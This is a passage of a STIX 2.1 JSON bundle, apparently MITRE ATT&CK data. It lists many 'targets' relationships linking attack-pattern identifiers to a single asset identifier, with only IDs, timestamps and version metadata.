"external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829362", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--88cf8cbd-a3fe-47cd-9cba-21d91ffc16f8", "created": "2024-07-01T10:37:15.829369", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829371", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--375e18c6-90d1-4425-9fcd-c835b80958b0", "created": "2024-07-01T10:37:15.829379", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829381", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f61ddc77-fe94-4bf4-8f2b-8e3c3a81895b", "created": "2024-07-01T10:37:15.829389", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829391", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d88d5f4e-129c-4744-90e9-601b46846eb8", "created": "2024-07-01T10:37:15.829399", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829401", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--416c09f3-e0f0-4b75-b94f-b78c5cba715b", "created": "2024-07-01T10:37:15.829409", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829411", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--088cb5e5-0b71-447c-8f7d-e672070dffd5", "created": "2024-07-01T10:37:15.829460", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829463", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--01e2bc84-45b6-4760-889e-d736c69eca32", "created": "2024-07-01T10:37:15.829472", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829474", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--13df48ea-e9ec-4bff-9373-07e0c22aed5d", "created": "2024-07-01T10:37:15.829482", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829484", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8782bf99-a1ed-4604-90ae-fa8a0b5c5184", "created": "2024-07-01T10:37:15.829492", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829494", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9d74b4ae-75cd-43aa-8d80-6cbed57dc9de", "created": "2024-07-01T10:37:15.829502", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829504", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4ad5ba45-3643-4316-9184-2cacdc119658", "created": "2024-07-01T10:37:15.829511", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829514", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c410238f-a81e-440b-a418-14a1a5716600", "created": "2024-07-01T10:37:15.829521", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829523", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a5f4bc71-9325-4450-a7c5-c219ff1b98a3", "created": "2024-07-01T10:37:15.829531", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829533", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aa707fa2-8ef0-48d2-b7b9-0683b331e805", "created": "2024-07-01T10:37:15.829541", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829543", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7bdf6b4d-48ab-4e03-933d-58027274b254", "created": "2024-07-01T10:37:15.829551", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829553", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c235b5ba-ea74-47bb-9ba6-8ff7d9d1c1e9", "created": "2024-07-01T10:37:15.829561", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829563", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ff0bde89-291b-419a-8a0f-8502d9a74181", "created": "2024-07-01T10:37:15.829571", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829573", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2561e753-061f-4de7-b9f2-85391bf83e6c", "created": "2024-07-01T10:37:15.829581", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829583", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4698d72a-72ee-425f-a4d3-6f131aafd17b", "created": "2024-07-01T10:37:15.829591", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829593", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--564998d8-ab3e-4123-93fb-eccaa6b9714a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8200da49-d685-4416-9f0a-5fc64588e116", "created": "2024-07-01T10:37:15.829601", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829603", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8004b2ab-5b29-4cbe-96eb-937b52a75fba", "created": "2024-07-01T10:37:15.829610", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829613", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3b15527b-f18a-4418-9cc3-3abb21fadd39", "created": "2024-07-01T10:37:15.829621", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829623", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5bbc9ea6-af86-4d1f-a8f2-e69bb119be68", "created": "2024-07-01T10:37:15.829630", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829633", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c3de8ab4-0f16-48e5-8405-11ec00926c34", "created": "2024-07-01T10:37:15.829640", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829643", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d4e7a105-77e4-4c9f-8a5b-2ec5ffacb1e7", "created": "2024-07-01T10:37:15.829650", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829652", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--319bc8f0-ee7a-45a2-b1c2-250a9e245924", "created": "2024-07-01T10:37:15.829661", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829663", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d96d4374-7c2a-4d99-bc3c-041120e4783c", "created": "2024-07-01T10:37:15.829671", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829673", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d5794e52-6158-4c98-8a2c-2f74536271b4", "created": "2024-07-01T10:37:15.829681", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829683", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--18f85ca7-a74e-44c7-bcb0-187aca713119", "created": "2024-07-01T10:37:15.829690", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829693", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6f397e37-5d4d-413b-a2ba-2a0cdb1d83db", "created": "2024-07-01T10:37:15.829701", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829703", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bd358ea4-905c-4c33-8bcb-972125c34199", "created": "2024-07-01T10:37:15.829711", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829713", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1fb1b043-aba9-4223-9962-21b62b2f07a0", "created": "2024-07-01T10:37:15.829721", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829723", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0923e57a-ba3b-4014-9b6f-e532974bd39b", "created": "2024-07-01T10:37:15.829731", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829733", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--be0f660c-8e6c-479e-8ab0-fdbcfaf74b45", "created": "2024-07-01T10:37:15.829741", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829743", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2f7f86c8-c709-41ab-ab5d-ba43bd2d0ddd", "created": "2024-07-01T10:37:15.829751", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829753", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3b9acabd-e702-4226-ae88-4e408981e89a", "created": "2024-07-01T10:37:15.829761", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829763", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9d73f64e-e1a1-4c7d-bb95-765505b7a8eb", "created": "2024-07-01T10:37:15.829770", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829773", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0774419e-9c8b-4cee-a723-8f070d5633fc", "created": "2024-07-01T10:37:15.829781", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829783", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--28d6142c-54de-4743-828f-1a262512b06a", "created": "2024-07-01T10:37:15.829790", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829793", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--42a1e425-4184-4595-9908-babdb055cbfc", "created": "2024-07-01T10:37:15.829801", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829803", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3b952857-42e1-4bdd-bf35-c05b4e3a382f", "created": "2024-07-01T10:37:15.829811", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829813", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90", "target_ref": 